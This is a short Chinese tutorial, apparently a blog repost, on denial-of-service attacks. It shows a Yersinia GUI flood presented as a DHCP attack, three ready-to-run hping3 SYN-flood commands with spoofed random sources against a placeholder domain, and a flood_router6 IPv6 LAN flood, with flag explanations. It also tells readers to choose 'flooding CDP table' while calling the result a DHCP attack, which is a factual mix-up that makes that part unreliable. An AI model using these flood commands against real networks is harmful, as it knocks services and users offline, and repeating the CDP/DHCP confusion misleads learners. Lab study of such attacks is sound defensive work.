天天看點

拒絕服務攻擊-DHCP攻擊/洪水攻擊

拒絕服務攻擊(dos攻擊):

                                           拒絕服務攻擊即攻擊者想辦法讓目标機器停止提供服務

                                           消耗帶寬,cpu,記憶體資源(各種洪水攻擊)

                                           延長響應時間

                                           利用服務漏洞,攻陷服務

                                           ip欺騙

分布式拒絕服務攻擊體系結構:

拒絕服務攻擊-DHCP攻擊/洪水攻擊

yersinia工具(可以發起dhcp攻擊)(kali裡面有):

                  yersinia是一款底層協定攻擊入侵檢測工具。他能實施針對多種協定的多種攻擊。例如奪取奪取生成樹的根角色(生成樹協定)生成虛拟CDP(cisco發現協定)鄰居,在一個hsrp(熱等待路由協定)環境中虛拟成一個活動的路由器,制造假DHCP回報,以及其他底層攻擊。

yersinia  -G   啟動圖形終端

拒絕服務攻擊-DHCP攻擊/洪水攻擊

選擇    flooding CDP table 然後點選ok!

可以拿自己的電腦做實驗,點選啟動後關閉自己的網絡,然後再選擇連接配接就會發現自己的網絡dhcp連接配接不上。到此dhcp拒絕服務攻擊就實驗成功了。

hping3工具(可以發起洪水攻擊)(kali裡面有):

hping是用于生成和解析tcp|ip協定資料包的開源工具,hping是安全審計,防火牆測試等工作的标配工具。hping優勢在于能夠定制資料包的各個部分,是以使用者可以靈活的對目标機進行細緻的探測。

hping3 -S --flood -V  xxx.xxx.com

hping3 -S -P-U --flood -V --rand-source xxx.xxx.com  

hping3 -S -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source xxx.xxx.com

(-S 表示指定模式為syn請求,--flood 表示洪水攻擊,-V表示顯示資料包的詳細資訊,-P-U表示對tcp請求的設定,--rand-source

表示動态的指定ip和虛拟ip,-c 表示發送資料包的個數,-d表示發送資料包的大小,-w 表示對tcp請求的定制,端口号)

以上三條指令都可以發起洪水攻擊

這裡還提到一個 flood_router6 工具  指令如下:

flood_router6 -H eth0      原理:通過路由器的廣播方式進行洪水攻擊(整個區域網路)